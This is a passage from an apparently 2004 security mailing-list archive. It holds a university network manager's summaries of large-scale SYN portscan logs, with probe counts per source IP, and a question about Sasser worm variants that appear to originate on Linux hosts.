xxx.yyy.255.249:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1316 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1327 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1338 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1360 -> xxx.yyy.255.254:1433 SYN ******S* 70195 Jul 5 00:00:07 82.33.67.40:1806 -> xxx.yyy.146.238:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1898 -> xxx.yyy.147.26:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1899 -> xxx.yyy.147.27:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1900 -> xxx.yyy.147.28:1433 SYN ******S* Jul 5 00:00:04 82.33.67.40:1852 -> xxx.yyy.147.0:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1902 -> xxx.yyy.147.29:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1903 -> xxx.yyy.147.30:1433 SYN ******S* Jul 5 00:00:06 82.33.67.40:1904 -> xxx.yyy.147.31:1433 SYN ******S* [...] Jul 5 01:38:13 82.33.67.40:3175 -> xxx.yyy.255.244:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3180 -> xxx.yyy.255.245:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3183 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3182 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3184 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3186 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 01:38:13 82.33.67.40:3192 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 01:38:14 82.33.67.40:3196 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 01:38:14 82.33.67.40:3197 -> xxx.yyy.255.254:1433 SYN ******S* 65830 Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jul 5 18:16:39 66.131.77.88:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jul 5 18:16:40 66.131.77.88:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.253:3128 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:3127 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:1080 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:10080 SYN ******S* Jul 5 21:00:47 66.131.77.88:22002 -> xxx.yyy.95.254:3128 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:3127 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:1080 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:10080 SYN ******S* Jul 5 21:00:48 66.131.77.88:22002 -> xxx.yyy.95.255:3128 SYN ******S* 62375 Jul 5 22:08:24 213.180.193.68:54118 -> xxx.yyy.1.41:1080 SYN ******S* Jul 5 22:08:24 213.180.193.68:59475 -> xxx.yyy.1.41:1180 SYN ******S* Jul 5 22:08:24 213.180.193.68:61599 -> xxx.yyy.1.41:1075 SYN ******S* Jul 5 22:08:24 213.180.193.68:35219 -> xxx.yyy.1.41:80 SYN ******S* Jul 5 22:08:24 213.180.193.68:44532 -> xxx.yyy.1.41:3128 SYN ******S* Jul 5 22:08:24 213.180.193.68:35402 -> xxx.yyy.1.41:8000 SYN ******S* Jul 5 22:08:24 213.180.193.68:54710 -> xxx.yyy.1.41:4480 SYN ******S* Jul 5 22:08:24 213.180.193.68:60276 -> xxx.yyy.1.41:8080 SYN ******S* [...] Jul 5 23:47:53 213.180.193.68:55561 -> xxx.yyy.1.41:2370 SYN ******S* Jul 5 23:47:53 213.180.193.68:41794 -> xxx.yyy.1.41:2372 SYN ******S* Jul 5 23:47:53 213.180.193.68:44819 -> xxx.yyy.1.41:2373 SYN ******S* Jul 5 23:47:53 213.180.193.68:56281 -> xxx.yyy.1.41:2374 SYN ******S* Jul 5 23:47:53 213.180.193.68:52951 -> xxx.yyy.1.41:2375 SYN ******S* Jul 5 23:47:53 213.180.193.68:53013 -> xxx.yyy.1.41:2376 SYN ******S* Jul 5 23:47:53 213.180.193.68:34779 -> xxx.yyy.1.41:2377 SYN ******S* Jul 5 23:47:53 213.180.193.68:62839 -> xxx.yyy.1.41:2379 SYN ******S* Jul 5 23:47:53 213.180.193.68:60225 -> xxx.yyy.1.41:7633 SYN ******S* 57997 Jul 5 13:43:38 216.65.39.38:39645 -> xxx.yyy.1.2:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39646 -> xxx.yyy.1.3:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39647 -> xxx.yyy.1.4:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39643 -> xxx.yyy.1.0:32773 SYN ******S* Jul 5 13:43:38 216.65.39.38:39644 -> xxx.yyy.1.1:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39650 -> xxx.yyy.1.7:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39648 -> xxx.yyy.1.5:32773 SYN ******S* Jul 5 13:43:41 216.65.39.38:39649 -> xxx.yyy.1.6:32773 SYN ******S* [...] Jul 5 13:52:45 216.65.39.38:47642 -> xxx.yyy.255.250:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47644 -> xxx.yyy.255.252:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47641 -> xxx.yyy.255.249:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47643 -> xxx.yyy.255.251:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47645 -> xxx.yyy.255.253:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47639 -> xxx.yyy.255.247:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47640 -> xxx.yyy.255.248:32773 SYN ******S* Jul 5 13:52:45 216.65.39.38:47646 -> xxx.yyy.255.254:32773 SYN ******S* 57467 Jul 5 00:01:44 218.107.144.98:2106 -> xxx.yyy.128.0:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2166 -> xxx.yyy.128.2:901 SYN ******S* Jul 5 00:01:47 218.107.144.98:2165 -> xxx.yyy.128.1:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2167 -> xxx.yyy.128.3:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2194 -> xxx.yyy.128.4:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2195 -> xxx.yyy.128.5:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2196 -> xxx.yyy.128.6:901 SYN ******S* Jul 5 00:01:49 218.107.144.98:2197 -> xxx.yyy.128.7:901 SYN ******S* [...] Jul 5 00:57:43 218.107.144.98:3820 -> xxx.yyy.254.236:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3833 -> xxx.yyy.254.249:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3830 -> xxx.yyy.254.246:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3827 -> xxx.yyy.254.243:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3824 -> xxx.yyy.254.240:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3821 -> xxx.yyy.254.237:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3837 -> xxx.yyy.254.253:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3834 -> xxx.yyy.254.250:901 SYN ******S* Jul 5 00:57:43 218.107.144.98:3831 -> xxx.yyy.254.247:901 SYN ******S* 54317 Jul 5 10:03:49 198.69.219.175:2392 -> xxx.yyy.1.1:6129 SYN ******S* Jul 5 10:03:52 198.69.219.175:2396 -> xxx.yyy.1.5:6129 SYN ******S* Jul 5 10:03:52 198.69.219.175:2398 -> xxx.yyy.1.7:6129 SYN ******S* Jul 5 10:03:52 198.69.219.175:2399 -> xxx.yyy.1.8:6129 SYN ******S* Jul 5 10:03:52 198.69.219.175:2401 -> xxx.yyy.1.10:6129 SYN ******S* Jul 5 10:03:49 198.69.219.175:2402 -> xxx.yyy.1.11:6129 SYN ******S* Jul 5 10:03:52 198.69.219.175:2406 -> xxx.yyy.1.15:6129 SYN ******S* Jul 5 10:03:49 198.69.219.175:2407 -> xxx.yyy.1.16:6129 SYN ******S* [...] Jul 5 10:14:27 198.69.219.175:2078 -> xxx.yyy.255.197:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2110 -> xxx.yyy.255.229:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2126 -> xxx.yyy.255.245:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2059 -> xxx.yyy.255.178:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2107 -> xxx.yyy.255.226:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2123 -> xxx.yyy.255.242:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2120 -> xxx.yyy.255.239:6129 SYN ******S* Jul 5 10:14:27 198.69.219.175:2104 -> xxx.yyy.255.223:6129 SYN ******S* 42531 Jul 5 14:48:46 218.148.76.176:3714 -> xxx.yyy.1.0:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3716 -> xxx.yyy.1.2:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3717 -> xxx.yyy.1.3:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3719 -> xxx.yyy.1.4:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3720 -> xxx.yyy.1.5:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3721 -> xxx.yyy.1.6:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3722 -> xxx.yyy.1.7:21 SYN ******S* Jul 5 14:48:46 218.148.76.176:3723 -> xxx.yyy.1.8:21 SYN ******S* [...] Jul 5 14:59:44 218.148.76.176:1624 -> xxx.yyy.255.252:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1612 -> xxx.yyy.255.240:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1627 -> xxx.yyy.255.255:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1617 -> xxx.yyy.255.245:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1620 -> xxx.yyy.255.248:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1622 -> xxx.yyy.255.250:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1625 -> xxx.yyy.255.253:21 SYN ******S* Jul 5 14:59:44 218.148.76.176:1626 -> xxx.yyy.255.254:21 SYN ******S* 40557 Jul 5 23:49:10 64.30.172.24:1697 -> xxx.yyy.1.1:715 SYN ******S* Jul 5 23:49:10 64.30.172.24:1698 -> xxx.yyy.1.2:715 SYN ******S* Jul 5 23:49:10 64.30.172.24:1699 -> xxx.yyy.1.3:715 SYN ******S* Jul 5 23:49:12 64.30.172.24:1700 -> xxx.yyy.1.4:715 SYN ******S* Jul 5 23:49:13 64.30.172.24:1701 -> xxx.yyy.1.5:715 SYN ******S* Jul 5 23:49:13 64.30.172.24:1702 -> xxx.yyy.1.6:715 SYN ******S* Jul 5 23:49:13 64.30.172.24:1704 -> xxx.yyy.1.7:715 SYN ******S* Jul 5 23:49:13 64.30.172.24:1705 -> xxx.yyy.1.8:715 SYN ******S* [...] Jul 6 00:00:00 64.30.172.24:4052 -> xxx.yyy.151.208:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4053 -> xxx.yyy.151.209:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4054 -> xxx.yyy.151.210:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4056 -> xxx.yyy.151.211:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4057 -> xxx.yyy.151.212:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4058 -> xxx.yyy.151.213:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4059 -> xxx.yyy.151.214:715 SYN ******S* Jul 6 00:00:00 64.30.172.24:4060 -> xxx.yyy.151.215:715 SYN ******S* Jul 6 00:00:01 64.30.172.24:4062 -> xxx.yyy.151.216:715 SYN ******S* 31424 Jul 5 15:36:05 203.70.58.114:41557 -> xxx.yyy.1.0:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41558 -> xxx.yyy.1.1:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41559 -> xxx.yyy.1.2:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41560 -> xxx.yyy.1.3:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41561 -> xxx.yyy.1.4:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41562 -> xxx.yyy.1.5:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41563 -> xxx.yyy.1.6:6112 SYN ******S* Jul 5 15:36:05 203.70.58.114:41564 -> xxx.yyy.1.7:6112 SYN ******S* [...] Jul 5 15:39:19 203.70.58.114:57645 -> xxx.yyy.255.246:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57647 -> xxx.yyy.255.248:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57648 -> xxx.yyy.255.249:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57649 -> xxx.yyy.255.250:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57650 -> xxx.yyy.255.251:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57651 -> xxx.yyy.255.252:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57652 -> xxx.yyy.255.253:6112 SYN ******S* Jul 5 15:39:19 203.70.58.114:57653 -> xxx.yyy.255.254:6112 SYN ******S* 30230 Jul 5 06:01:23 24.37.175.52:58646 -> xxx.yyy.1.11:2401 SYN ******S* Jul 5 06:01:23 24.37.175.52:58647 -> xxx.yyy.1.12:2401 SYN ******S* Jul 5 06:01:23 24.37.175.52:58648 -> xxx.yyy.1.13:2401 SYN ******S* Jul 5 06:01:20 24.37.175.52:58651 -> xxx.yyy.1.16:2401 SYN ******S* Jul 5 06:01:20 24.37.175.52:58652 -> xxx.yyy.1.17:2401 SYN ******S* Jul 5 06:01:23 24.37.175.52:58649 -> xxx.yyy.1.14:2401 SYN ******S* Jul 5 06:01:23 24.37.175.52:58650 -> xxx.yyy.1.15:2401 SYN ******S* Jul 5 06:01:23 24.37.175.52:58653 -> xxx.yyy.1.18:2401 SYN ******S* [...] Jul 5 06:15:44 24.37.175.52:38804 -> xxx.yyy.255.48:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38805 -> xxx.yyy.255.49:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38808 -> xxx.yyy.255.52:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38807 -> xxx.yyy.255.51:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38806 -> xxx.yyy.255.50:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38810 -> xxx.yyy.255.54:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38811 -> xxx.yyy.255.55:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38809 -> xxx.yyy.255.53:2401 SYN ******S* Jul 5 06:15:44 24.37.175.52:38812 -> xxx.yyy.255.56:2401 SYN ******S* 21788 Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.2:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.4:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.3:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.5:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.7:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.10:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.8:111 SYN ******S* Jul 5 07:54:57 66.201.243.156:111 -> xxx.yyy.1.9:111 SYN ******S* [...] Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.231:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.232:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.234:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.236:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.238:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.239:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.240:111 SYN ******S* Jul 5 07:55:12 66.201.243.156:111 -> xxx.yyy.255.244:111 SYN ******S* 16588 Jul 5 01:00:26 221.192.38.124:1433 -> xxx.yyy.153.139:5554 SYN ******S* Jul 5 01:00:27 221.192.38.124:1805 -> xxx.yyy.153.139:1023 SYN ******S* Jul 5 01:00:29 221.192.38.124:2737 -> xxx.yyy.153.139:9898 SYN ******S* Jul 5 01:00:26 221.192.38.124:1432 -> xxx.yyy.153.138:5554 SYN ******S* Jul 5 01:00:27 221.192.38.124:1816 -> xxx.yyy.153.138:1023 SYN ******S* Jul 5 01:00:29 221.192.38.124:2734 -> xxx.yyy.153.138:9898 SYN ******S* Jul 5 01:00:26 221.192.38.124:1435 -> xxx.yyy.153.141:5554 SYN ******S* Jul 5 01:00:27 221.192.38.124:1817 -> xxx.yyy.153.141:1023 SYN ******S* [...] Jul 5 01:01:19 221.192.38.124:2164 -> xxx.yyy.173.245:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2158 -> xxx.yyy.173.253:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2167 -> xxx.yyy.174.0:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2169 -> xxx.yyy.174.2:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2165 -> xxx.yyy.173.246:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2168 -> xxx.yyy.174.1:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2170 -> xxx.yyy.173.254:9898 SYN ******S* Jul 5 01:01:19 221.192.38.124:2182 -> xxx.yyy.173.255:9898 SYN ******S* 15209 Jul 5 23:56:34 220.121.93.200:2472 -> xxx.yyy.215.210:5554 SYN ******S* Jul 5 23:56:35 220.121.93.200:2973 -> xxx.yyy.215.210:1023 SYN ******S* Jul 5 23:56:37 220.121.93.200:4382 -> xxx.yyy.215.210:9898 SYN ******S* Jul 5 23:56:34 220.121.93.200:2473 -> xxx.yyy.215.211:5554 SYN ******S* Jul 5 23:56:35 220.121.93.200:2975 -> xxx.yyy.215.211:1023 SYN ******S* Jul 5 23:56:37 220.121.93.200:4402 -> xxx.yyy.215.211:9898 SYN ******S* Jul 5 23:56:34 220.121.93.200:2475 -> xxx.yyy.215.212:5554 SYN ******S* Jul 5 23:56:35 220.121.93.200:2976 -> xxx.yyy.215.212:1023 SYN ******S* [...] Jul 5 23:57:19 220.121.93.200:3771 -> xxx.yyy.236.62:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3776 -> xxx.yyy.236.66:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3777 -> xxx.yyy.236.67:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3779 -> xxx.yyy.236.68:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3782 -> xxx.yyy.236.70:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3795 -> xxx.yyy.236.73:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3797 -> xxx.yyy.236.75:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3794 -> xxx.yyy.236.72:9898 SYN ******S* Jul 5 23:57:19 220.121.93.200:3798 -> xxx.yyy.236.76:9898 SYN ******S* 15128 Jul 5 00:55:02 221.201.83.59:2448 -> xxx.yyy.71.160:5554 SYN ******S* Jul 5 00:55:02 221.201.83.59:3095 -> xxx.yyy.71.160:1023 SYN ******S* Jul 5 00:55:04 221.201.83.59:4547 -> xxx.yyy.71.160:9898 SYN ******S* Jul 5 00:55:02 221.201.83.59:2453 -> xxx.yyy.71.161:5554 SYN ******S* Jul 5 00:55:02 221.201.83.59:3096 -> xxx.yyy.71.161:1023 SYN ******S* Jul 5 00:55:04 221.201.83.59:4548 -> xxx.yyy.71.161:9898 SYN ******S* Jul 5 00:55:02 221.201.83.59:2456 -> xxx.yyy.71.164:5554 SYN ******S* Jul 5 00:55:02 221.201.83.59:3101 -> xxx.yyy.71.164:1023 SYN ******S* [...] Jul 5 00:55:44 221.201.83.59:1573 -> xxx.yyy.91.247:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1574 -> xxx.yyy.91.248:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1592 -> xxx.yyy.91.246:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1594 -> xxx.yyy.91.249:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1626 -> xxx.yyy.91.250:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1627 -> xxx.yyy.91.251:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1628 -> xxx.yyy.91.252:9898 SYN ******S* Jul 5 00:55:44 221.201.83.59:1639 -> xxx.yyy.91.253:9898 SYN ******S* 14808 Jul 5 00:56:17 61.49.148.84:2569 -> xxx.yyy.235.115:5554 SYN ******S* Jul 5 00:56:18 61.49.148.84:2969 -> xxx.yyy.235.115:1023 SYN ******S* Jul 5 00:56:17 61.49.148.84:2570 -> xxx.yyy.235.116:5554 SYN ******S* Jul 5 00:56:18 61.49.148.84:2970 -> xxx.yyy.235.116:1023 SYN ******S* Jul 5 00:56:17 61.49.148.84:2572 -> xxx.yyy.235.117:5554 SYN ******S* Jul 5 00:56:18 61.49.148.84:2973 -> xxx.yyy.235.117:1023 SYN ******S* Jul 5 00:56:17 61.49.148.84:2577 -> xxx.yyy.235.118:5554 SYN ******S* Jul 5 00:56:18 61.49.148.84:2985 -> xxx.yyy.235.118:1023 SYN ******S* [...] Jul 5 00:57:46 61.49.148.84:2191 -> xxx.yyy.255.128:9898 SYN ******S* Jul 5 00:57:46 61.49.148.84:2214 -> xxx.yyy.255.141:9898 SYN ******S* Jul 5 00:57:46 61.49.148.84:2217 -> xxx.yyy.255.143:9898 SYN ******S* Jul 5 00:57:46 61.49.148.84:2215 -> xxx.yyy.255.142:9898 SYN ******S* Jul 5 00:57:47 61.49.148.84:2224 -> xxx.yyy.255.139:9898 SYN ******S* Jul 5 00:57:47 61.49.148.84:2226 -> xxx.yyy.255.140:9898 SYN ******S* Jul 5 00:57:47 61.49.148.84:2228 -> xxx.yyy.255.137:9898 SYN ******S* Jul 5 00:57:47 61.49.148.84:2229 -> xxx.yyy.255.138:9898 SYN ******S* 13045 Jul 5 00:56:04 61.55.25.234:1523 -> xxx.yyy.133.16:5554 SYN ******S* Jul 5 00:56:07 61.55.25.234:3419 -> xxx.yyy.133.16:9898 SYN ******S* Jul 5 00:56:04 61.55.25.234:1522 -> xxx.yyy.133.19:5554 SYN ******S* Jul 5 00:56:07 61.55.25.234:3439 -> xxx.yyy.133.19:9898 SYN ******S* Jul 5 00:56:04 61.55.25.234:1524 -> xxx.yyy.133.17:5554 SYN ******S* Jul 5 00:56:07 61.55.25.234:3420 -> xxx.yyy.133.17:9898 SYN ******S* Jul 5 00:56:04 61.55.25.234:1630 -> xxx.yyy.133.22:5554 SYN ******S* Jul 5 00:56:05 61.55.25.234:2324 -> xxx.yyy.133.22:1023 SYN ******S* [...] Jul 5 00:56:46 61.55.25.234:3011 -> xxx.yyy.153.4:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3012 -> xxx.yyy.153.5:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3027 -> xxx.yyy.153.10:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3028 -> xxx.yyy.153.11:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3022 -> xxx.yyy.153.6:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3024 -> xxx.yyy.153.7:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3025 -> xxx.yyy.153.8:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3236 -> xxx.yyy.153.55:9898 SYN ******S* Jul 5 00:56:46 61.55.25.234:3240 -> xxx.yyy.153.59:9898 SYN ******S* 12526 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From sean at coldstream.ca Tue Jul 6 20:59:04 2004 From: sean at coldstream.ca (Sean Rooney) Date: Tue, 6 Jul 2004 16:59:04 -0400 Subject: [Intrusions] question re: sasser variants? [linux crossover?] Message-ID: <50882476-CF8F-11D8-B1AD-000D93510DB8@coldstream.ca> We are seeing what looks like a Sasser worm (exploits port 445 netbios defects on Windows to set up shop and reproduce) but some of the origins are actually Linux boxes. Are you aware of a variant that performs some other attack to lodge on Linux systems? I'm afraid I can't give you much more information than that. for the time being. I'm attempting to capture live data [ethereal] and a live sample of this worm if able, and will supply followup technical analysis at an appropriate time. [I like things you can measure and quantify in precise terms the potential impact of this type of crossover is still being evaluated and we invite commentary. Cheers -sr ------------------------------------------------------------- Sean Rooney, CTO ColdStream Associates Ltd. PGP fingerprint: C32C 88A0 86A8 2BBE 2911 D855 1CE1 1679 6B52 405C "Illos laetae devorunt, qui nos subicient." TigerTeaming Whitepaper: http://www.coldstream.ca/resources/tigerteams.pdf Ask about our spring special for packaged IT-Security Testing. From Ken.Connelly at uni.edu Wed Jul 7 11:24:48 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Wed, 07 Jul 2004 06:24:48 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC64VNXSFO8YBZ2Y@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 6 01:42:12 209.135.97.164:2418 -> xxx.yyy.1.1:554 SYN ******S* Jul 6 01:42:12 209.135.97.164:2419 -> xxx.yyy.1.2:554 SYN ******S* Jul 6 01:42:12 209.135.97.164:2420 -> xxx.yyy.1.3:554 SYN ******S* Jul 6 01:42:14 209.135.97.164:2421 -> xxx.yyy.1.4:554 SYN ******S* Jul 6 01:42:14 209.135.97.164:2422 -> xxx.yyy.1.5:554 SYN ******S* Jul 6 01:42:14 209.135.97.164:2423 -> xxx.yyy.1.6:554 SYN ******S* Jul 6 01:42:14 209.135.97.164:2424 -> xxx.yyy.1.7:554 SYN ******S* Jul 6 01:42:11 209.135.97.164:2425 -> xxx.yyy.1.8:554 SYN ******S* [...] Jul 6 01:53:15 209.135.97.164:2089 -> xxx.yyy.255.204:554 SYN ******S* Jul 6 01:53:15 209.135.97.164:2082 -> xxx.yyy.255.197:554 SYN ******S* Jul 6 01:53:15 209.135.97.164:2086 -> xxx.yyy.255.201:554 SYN ******S* Jul 6 01:53:15 209.135.97.164:2083 -> xxx.yyy.255.198:554 SYN ******S* Jul 6 01:53:15 209.135.97.164:2090 -> xxx.yyy.255.205:554 SYN ******S* Jul 6 01:53:16 209.135.97.164:2097 -> xxx.yyy.255.212:554 SYN ******S* Jul 6 01:53:16 209.135.97.164:2098 -> xxx.yyy.255.213:554 SYN ******S* Jul 6 01:53:16 209.135.97.164:2095 -> xxx.yyy.255.210:554 SYN ******S* Jul 6 01:53:16 209.135.97.164:2096 -> xxx.yyy.255.211:554 SYN ******S* 74017 Jul 6 23:20:06 128.148.60.132:2259 -> xxx.yyy.1.1:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2260 -> xxx.yyy.1.2:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2261 -> xxx.yyy.1.3:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2262 -> xxx.yyy.1.4:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2263 -> xxx.yyy.1.5:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2264 -> xxx.yyy.1.6:1433 SYN ******S* Jul 6 23:20:06 128.148.60.132:2265 -> xxx.yyy.1.7:1433 SYN ******S* Jul 6 23:20:03 128.148.60.132:2266 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 6 23:31:44 128.148.60.132:4839 -> xxx.yyy.255.251:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4836 -> xxx.yyy.255.248:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4842 -> xxx.yyy.255.254:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4840 -> xxx.yyy.255.252:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4837 -> xxx.yyy.255.249:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4838 -> xxx.yyy.255.250:1433 SYN ******S* Jul 6 23:31:44 128.148.60.132:4835 -> xxx.yyy.255.247:1433 SYN ******S* Jul 6 23:31:44 